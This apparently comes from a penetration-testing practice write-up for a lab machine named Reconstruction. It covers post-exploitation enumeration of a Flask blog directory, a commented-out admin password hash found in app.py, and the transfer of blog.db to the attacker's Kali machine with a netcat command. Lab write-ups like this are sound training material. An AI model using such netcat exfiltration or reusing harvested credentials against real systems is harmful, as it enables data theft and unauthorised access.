Blog
Checking for web application directory after performing a manual enumeration
www-data@reconstruction:~/blog$ ll
total 88K
4.0K drwxr-xr-x 3 root root 4.0K Sep 30 2020 ..
4.0K drwxr-xr-x 5 root root 4.0K Apr 29 2020 .
12K -rwxr-xr-x 1 root root 9.7K Apr 29 2020 app.py
4.0K drwxr-xr-x 3 root root 4.0K Apr 29 2020 templates
4.0K drwxr-xr-x 2 root root 4.0K Apr 29 2020 __pycache__
4.0K -rw-r--r-- 1 root root 76 Apr 29 2020 wsgi.py
44K -rw-r--r-- 1 root root 44K Apr 29 2020 blog.db
4.0K -rw-r--r-- 1 root root 193 Apr 29 2020 blog.ini
4.0K -rw-r--r-- 1 root root 13 Apr 29 2020 default.blog
4.0K drwxr-xr-x 5 root root 4.0K Apr 29 2020 staticThere is the app.py file as well as the DB file; blog.db
app.py
/Practice/Reconstruction/4-Post_Enumeration/attachments/{58EC1C72-2AC8-4F40-AB22-06F6EF69C540}.png)
The app.py file contains another admin password that’s commented out; ee05d64d2528102d45e2db60986727ed
This may be used to test for password reuse
Database
www-data@reconstruction:~/blog$ nc -nv 192.168.45.215 2222 < ./blog.db
Connection to 192.168.45.215 2222 port [tcp/*] succeeded!
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/reconstruction]
└─$ nnc 2222 > blog.db
listening on [any] 2222 ...
connect to [192.168.45.215] from (UNKNOWN) [192.168.209.103] 54362Transferred to Kali
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/reconstruction]
└─$ file blog.db
blog.db: SQLite 3.x database, last written using SQLite version 3022000, file counter 6, database pages 11, cookie 0xa, schema 4, UTF-8, version-valid-for 6/Practice/Reconstruction/4-Post_Enumeration/attachments/{62421072-44DA-4923-9AC9-F04A1E0DE863}.png)
N/A